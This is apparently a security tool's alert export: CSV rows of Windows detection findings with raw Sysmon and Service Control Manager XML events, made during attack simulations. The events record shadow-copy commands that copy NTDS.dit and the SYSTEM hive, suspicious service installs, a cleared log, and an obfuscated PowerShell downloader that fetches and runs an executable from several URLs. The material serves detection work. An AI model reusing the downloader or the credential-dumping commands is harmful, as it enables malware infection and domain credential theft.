<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:27.202862Z"">
</TimeCreated>
<EventRecordID>4132</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:27.192</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00102D4D4B00</Data>
<Data Name=""ProcessId"">976</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:27.169217Z"">
</TimeCreated>
<EventRecordID>4131</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:27.156</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00101A4A4B00</Data>
<Data Name=""ProcessId"">5772</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:27.082080Z"">
</TimeCreated>
<EventRecordID>4130</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:27.069</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00107B454B00</Data>
<Data Name=""ProcessId"">3344</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T12:52:43.702578Z"">
</TimeCreated>
<EventRecordID>10446</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""468"" ThreadID=""3256"">
</Execution>
<Channel>System</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-21-3583694148-1414552638-2922671848-1000"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">WinPwnage</Data>
<Data Name=""ImagePath"">%COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">demand start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",IEWIN7,System
cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T12:52:43.702578Z"">
</TimeCreated>
<EventRecordID>10446</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""468"" ThreadID=""3256"">
</Execution>
<Channel>System</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-21-3583694148-1414552638-2922671848-1000"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">WinPwnage</Data>
<Data Name=""ImagePath"">%COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">demand start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",IEWIN7,System
Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T00:41:29.008933Z"">
</TimeCreated>
<EventRecordID>6045</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2308"">
</Execution>
<Channel>System</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-500"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">remotesvc</Data>
<Data Name=""ImagePath"">calc.exe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">auto start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",WIN-77LTAPHIQ1R.example.corp,System
System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>104</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:34:25.894341Z"">
</TimeCreated>
<EventRecordID>27736</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""812"" ThreadID=""3916"">
</Execution>
<Channel>System</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1106"">
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserName>user01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<Channel>System</Channel>
<BackupPath></BackupPath>
</LogFileCleared>
</UserData>
</Event>",PC01.example.corp,System
Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-03T09:24:24.699653Z"">
</TimeCreated>
<EventRecordID>4482</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2024"">
</Execution>
<Channel>System</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1108"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">spoolsv</Data>
<Data Name=""ImagePath"">cmd.exe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">auto start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",WIN-77LTAPHIQ1R.example.corp,System
Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-03T09:20:28.621489Z"">
</TimeCreated>
<EventRecordID>4480</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""140"">
</Execution>
<Channel>System</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1108"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">spoolfool</Data>
<Data Name=""ImagePath"">cmd.exe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">auto start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",WIN-77LTAPHIQ1R.example.corp,System
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) 
neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos
;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Get-Item): &quot;Get-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""PowerShell"">
</Provider>
<EventID Qualifiers=""0"">800</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:33.349710Z"">
</TimeCreated>
<EventRecordID>789</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""0"" ThreadID=""0"">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security>
</Security>
</System>
<EventData>
<Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&a
pos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;), DetailSequence=1
DetailTotal=1
SequenceNumber=27
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
